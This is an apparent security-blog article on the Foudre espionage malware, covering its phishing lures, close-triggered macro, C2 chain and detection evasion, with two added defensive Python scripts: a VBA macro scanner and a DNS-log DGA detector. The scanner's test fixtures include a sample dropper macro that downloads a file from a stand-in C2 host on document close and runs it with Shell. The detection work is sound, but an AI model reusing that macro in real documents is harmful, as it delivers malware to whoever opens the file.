Cyberwarfare is far more prevalent than a regular user thinks. Whatever you hear or see on the news is just the tip of the iceberg, and security researchers have to grapple with multiple threat actors every single day. Foudre Malware is one such infection used in cyberwarfare. A regular user may not know much about such threats because they usually target corporate computers. However, anyone could be targeted by this malicious actor.
Foudre Malware is a malicious program thought to be created by Iranian state-backed hackers. The operation behind this malware is called Infy or Prince of Persia. And no, they are not related to the game whatsoever. The operation has been known since 2007, although it constantly reinvents itself and comes back with new versions of malware. Hence, Infy is classified as an APT, or Advanced Persistent Threat.
Infy mostly focuses on PCs, and the operation employs malware for cyberespionage. Over the years, the operation has used various malware components to eavesdrop on its victims. Foudre Malware was first used in 2017. The malware's name comes from one of its keylogging windows; it means “lightning” in French.
A new version of the Foudre Malware infection was detected in 2020. Like most of the previously used Foudre Malware components, it is programmed in the Delphi programming language. To put it simply, this malware works like a carriage that delivers a second-stage payload into the target system. It is like a nutshell that, once cracked, releases the real player into the wild. This player is called Tonnerre Malware, and we will discuss that infection in greater detail in our next entry.
So, how do users get infected with Foudre Malware? Usually, the infection reaches its victims through spam or phishing emails. These are mostly targeted phishing emails because they aim at specific victims. The previous versions of Foudre Malware would arrive through links that supposedly opened a video. This new version, however, launches when the user closes the malicious document: the close event triggers a malicious macro.
The document in question is often some kind of photo of an Iranian official together with their phone number (the phone number is usually fake). There are also instances where documents supposedly sent by various Persian organizations and foundations are used to lure unsuspecting victims. Either way, the victims do not need to click anywhere in the document. Just opening it is enough, because Foudre Malware runs automatically when the document is closed. Here is essentially what happens when victims trigger the malware installation:
- The macro downloads the first-stage payload with Foudre Malware,
- Foudre Malware connects to its command and control (C2) server and downloads Tonnerre Malware,
- Tonnerre Malware starts running and receives further commands.
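The chain above starts with a macro that fires on the document's close event rather than on a click. Defenders and document-scanning pipelines can look for exactly that pattern: a close-triggered procedure combined with download-and-execute APIs. The following Python triage helper is an added example, not code from the original article or from any Foudre analysis; the VBA snippets it scans are constructed for illustration, the trigger and API name lists are assumptions drawn from common macro-analysis practice, and the verdict labels are our own.

```python
import re

# Procedure names that Office runs automatically (Word/Excel auto-exec triggers).
AUTOEXEC_TRIGGERS = {
    "Document_Close": "runs when a Word document is closed",
    "AutoClose": "runs when a Word document is closed (legacy name)",
    "Document_Open": "runs when a Word document is opened",
    "AutoOpen": "runs when a Word document is opened (legacy name)",
    "Workbook_Open": "runs when an Excel workbook is opened",
    "Auto_Open": "runs when an Excel workbook is opened (legacy name)",
}
_TRIGGER_LOOKUP = {name.lower(): name for name in AUTOEXEC_TRIGGERS}

# APIs that fetch content from the network or write/run files; not malicious
# on their own, but suspicious next to an auto-exec trigger.
DOWNLOAD_APIS = {"URLDownloadToFile", "XMLHTTP", "ADODB.Stream"}
EXECUTE_APIS = {"Shell", "CreateObject"}
OTHER_APIS = {"Environ"}
SUSPICIOUS_APIS = DOWNLOAD_APIS | EXECUTE_APIS | OTHER_APIS

_SUB_DECL = re.compile(r"^\s*(?:Private\s+|Public\s+)?Sub\s+(\w+)\s*\(", re.I | re.M)
_URL = re.compile(r"https?://[^\s\"']+", re.I)


def analyze_vba(source: str) -> dict:
    """Scan VBA source text for auto-exec triggers, risky APIs and URLs."""
    triggers = sorted(
        {_TRIGGER_LOOKUP[m.group(1).lower()]
         for m in _SUB_DECL.finditer(source)
         if m.group(1).lower() in _TRIGGER_LOOKUP}
    )
    suspicious = sorted(
        api for api in SUSPICIOUS_APIS
        if re.search(r"\b" + re.escape(api) + r"\b", source, re.I)
    )
    urls = _URL.findall(source)

    found = set(suspicious)
    if triggers and found & DOWNLOAD_APIS and found & EXECUTE_APIS:
        verdict = "auto-exec dropper pattern"
    elif triggers and suspicious:
        verdict = "auto-exec with suspicious API"
    elif triggers:
        verdict = "auto-exec only"
    else:
        verdict = "no auto-exec trigger"
    return {"triggers": triggers, "suspicious": suspicious, "urls": urls, "verdict": verdict}


# Constructed samples (not real Foudre macros): a close-triggered downloader,
# a harmless close handler, and a macro with no auto-exec trigger at all.
SAMPLE_DROPPER = r"""
Sub Document_Close()
    Dim dropPath As String
    dropPath = Environ("TEMP") & "\stage1.exe"
    Call URLDownloadToFile(0, "http://c2.example.invalid/stage1.bin", dropPath, 0, 0)
    Shell dropPath, vbHide
End Sub
"""

SAMPLE_SAVE_ON_CLOSE = """
Sub Document_Close()
    ActiveDocument.Save
End Sub
"""

SAMPLE_BENIGN = """
Sub FormatTable()
    Selection.Tables(1).AutoFitBehavior wdAutoFitContent
End Sub
"""

if __name__ == "__main__":
    for name, src in [("dropper", SAMPLE_DROPPER),
                      ("save-on-close", SAMPLE_SAVE_ON_CLOSE),
                      ("benign", SAMPLE_BENIGN)]:
        print(name, "->", analyze_vba(src))
```

In practice the VBA text would come from a macro extractor such as olevba rather than a string literal, and a close-triggered download-and-execute combination is a strong enough signal to quarantine the attachment before anyone opens it. Note that an auto-exec trigger alone (the save-on-close sample) is common in legitimate templates, which is why the verdict separates it from the dropper pattern.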
This is where the shell of Foudre Malware falls off and Tonnerre Malware takes over to carry on its espionage activities. Everything happens behind the victim’s back. What’s more, the newest Foudre Malware version is also better at avoiding detection because it comes with three key differences compared to the previous versions.
First, it uses an updated domain generation algorithm (DGA) to avoid detection; instead of contacting hard-coded domains, it generates the domains it uses. Another thing that increases its stealth is C2 RSA verification, where Foudre Malware downloads a digital signature file from its C2 server and verifies it. We also mentioned that this threat gets its name from one of its keylogging windows, but the newest version lacks this component, too. Security researchers believe that this change allows the infection to avoid signature-based detection.
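Because the article does not publish the DGA itself, a blocklist of known domains is of little use against it; what defenders can watch for instead is the side effect every DGA leaves in DNS logs: bursts of high-entropy, vowel-poor domain names, many of which do not resolve. The script below is an added example (not code from the article or from any Foudre report) that scores the registered label of each queried name and flags clients that exceed a hit threshold. The log format, the domain names and the thresholds are all constructed assumptions for illustration.

```python
import math
from collections import Counter, defaultdict

VOWELS = set("aeiou")


def registered_label(qname: str) -> str:
    """Return the label just left of the TLD ("example" for www.example.com).
    Naive two-level split; production code would consult the public suffix list."""
    parts = qname.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def score_label(label: str) -> dict:
    """Heuristic features of one registered label. Thresholds are assumptions:
    long, high-entropy, vowel-poor labels are typical of algorithmically
    generated names and rare in human-chosen brand names."""
    length = len(label)
    vowel_ratio = sum(ch in VOWELS for ch in label) / length if length else 0.0
    entropy = shannon_entropy(label)
    dga_like = length >= 10 and entropy >= 3.0 and vowel_ratio <= 0.25
    return {
        "label": label,
        "length": length,
        "entropy": round(entropy, 2),
        "vowel_ratio": round(vowel_ratio, 2),
        "dga_like": dga_like,
    }


def analyze_dns_log(text: str, min_hits: int = 3) -> dict:
    """Group queries per client; flag clients with >= min_hits DGA-like names
    or >= min_hits NXDOMAIN answers (DGA clients probe many dead domains)."""
    clients = defaultdict(lambda: {"queries": 0, "nxdomain": 0, "dga_like": []})
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip malformed lines rather than crash the pipeline
        _ts, client, qname, rcode = fields
        entry = clients[client]
        entry["queries"] += 1
        if rcode.upper() == "NXDOMAIN":
            entry["nxdomain"] += 1
        if score_label(registered_label(qname))["dga_like"]:
            entry["dga_like"].append(qname)
    flagged = sorted(
        c for c, e in clients.items()
        if len(e["dga_like"]) >= min_hits or e["nxdomain"] >= min_hits
    )
    return {"clients": dict(clients), "flagged_clients": flagged}


# Constructed resolver log: "<timestamp> <client IP> <query name> <rcode>".
# The random-looking names are made up and are not Foudre indicators.
SAMPLE_DNS_LOG = """\
2020-06-01T09:00:01 10.0.0.5 www.example.com NOERROR
2020-06-01T09:00:02 10.0.0.5 mail.example.com NOERROR
2020-06-01T09:00:03 10.0.0.7 xk2q9vzt7lm4w.net NXDOMAIN
2020-06-01T09:00:03 10.0.0.7 p8r3nqz6hd1ty.com NXDOMAIN
2020-06-01T09:00:04 10.0.0.7 zv7m1kq3xw9pb.org NXDOMAIN
2020-06-01T09:00:04 10.0.0.7 qj4t8wzn2lr6f.net NXDOMAIN
2020-06-01T09:00:05 10.0.0.7 h9c3vxp7m2kqz.com NOERROR
2020-06-01T09:00:06 10.0.0.9 cdn.wikipedia.org NOERROR
"""

if __name__ == "__main__":
    report = analyze_dns_log(SAMPLE_DNS_LOG)
    for client, entry in report["clients"].items():
        print(client, entry)
    print("flagged:", report["flagged_clients"])
```

Scoring the registered label rather than the full hostname matters: CDN and cloud hostnames routinely carry random-looking subdomains under a perfectly ordinary registered domain, and scoring the whole name would drown the alert in false positives. A flagged client is a lead for the host-level scan the article recommends, not proof of infection on its own.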
All in all, it is possible to avoid Foudre Malware and related infections if potential victims stay vigilant and refresh their cybersecurity knowledge regularly. On the other hand, these threat actors are stealthy and might run in the background of a compromised system for a long time before anyone takes notice. Hence, regular system scans with licensed security products are vital for early detection and swift malware removal.